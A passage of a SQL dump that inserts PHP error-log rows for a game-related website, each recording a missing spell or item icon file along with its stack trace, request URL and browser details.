`post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (674, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_frost_glacier.png\' found.', '2215f5c3d4a54d0b37e010e5f2eada9a26775e1c', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_frost_gla...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_frost_gla...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:42:45', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_frost_glacier.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 9, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (675, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_frost_chillingblast.png\' found.', '4c2b5ba1d0463e1cdf1d9aa78164d180e7b5efe4', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_frost_chi...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_frost_chi...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:42:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_frost_chillingblast.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 7, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (676, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_building.png\' found.', '35067ddc8933761c30a5187e3e9ad1075841896d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_bu...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_bu...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:08:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_shadow_building.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 88, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (677, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_abominationexplosion.png\' found.', '702ecd7ced5aa786408b74053252250ba0335940', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_ab...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_ab...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:44:38', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_abominationexplosion.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 57, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (678, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_explosion.png\' found.', 'c4de76a8a45de335168da313ced5def3a37b514b', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_ex...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_ex...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.024, '2014-12-14 03:09:52', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_explosion.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 92, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (679, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_mannoroth.png\' found.', 'b8c81881ff9e3c9a287492cd374787942fbca0c2', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_ma...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_ma...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:09:32', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_shadow_mannoroth.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 86, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (680, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_haunting.png\' found.', 'd3ac80110268b0b26c14082267628fc02f99422f', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_ha...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_ha...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.02, '2014-12-14 03:44:37', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_haunting.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 143, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (681, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_lifedrain02.png\' found.', '959d8317c03d443b47029d2768694278cfe7a941', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_li...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_li...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:50:47', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_lifedrain02.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 141, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (682, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_curseofsargeras.png\' found.', '6b4855d7948d3c57a975ee79b63f0e3a72c29dc7', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_cu...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_cu...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.02, '2014-12-14 03:44:37', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_curseofsargeras.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 137, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (683, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_fingerofdeath.png\' found.', '85340da9f06d21b3e1bd287ff2c6e087ce603af1', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_fi...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_fi...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:44:36', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_shadow_fingerofdeath.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 135, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (684, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_contagion.png\' found.', '00be038801f7d943fdd80ee529701999943d7610', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_co...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_co...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:44:36', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_contagion.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 133, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (685, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_shadetruesight.png\' found.', '974ea0099b2678f178a630600c56bad5a63a8356', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_sh...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_sh...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.02, '2014-12-14 03:44:33', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_shadow_shadetruesight.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 121, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (686, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_callofbone.png\' found.', 'b475bb292c195f4d7a1da56053f6cefa6a9fc719', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_ca...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_ca...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:44:35', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_callofbone.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 103, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (687, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_stone_04.png\' found.', '33e20d9cc9ee234e5fb9934f38ce08d0072944ec', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_stone_04.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_stone_04.pn...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.02, '2014-12-14 03:44:39', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=inv_stone_04.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 99, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (688, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_metamorphosis.png\' found.', '6313a40a6cc7dee25840a1d606c2a1ca519fe01c', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_me...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_me...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:44:39', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_metamorphosis.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 95, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (689, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_summonvoidwalker.png\' found.', '666c75f477ea139b6b1b40ee747d4a033a0a2d01', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_su...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_su...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:50:47', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_shadow_summonvoidwalker.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 93, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (690, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_magicalsentry.png\' found.', '20419c9b7e7a7c6cfac04004a99151c3ab3d71df', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_magi...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_magi...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:44:39', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_magicalsentry.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 89, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (691, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_removecurse.png\' found.', 'c106cf21bd563142cfcd6cefe625fa7c994a7b99', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_re...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_re...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:44:38', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_nature_removecurse.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 85, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (692, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_impshapeshift.png\' found.', '3942e1ac49d57842fb5894fc810907c7b4760848', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_im...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_im...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.048, '2014-12-14 03:05:17', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_shadow_impshapeshift.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (693, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_enslavedemon.png\' found.', '54fb3796449a7db11b7835fe7fc6612cccf01653', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_en...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_en...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:44:38', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_enslavedemon.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 75, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (694, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_ammo_firetar.png\' found.', 'eb81c969274dac8f67ffef0c9eec4025f23aa07d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_ammo_fireta...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_ammo_fireta...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): 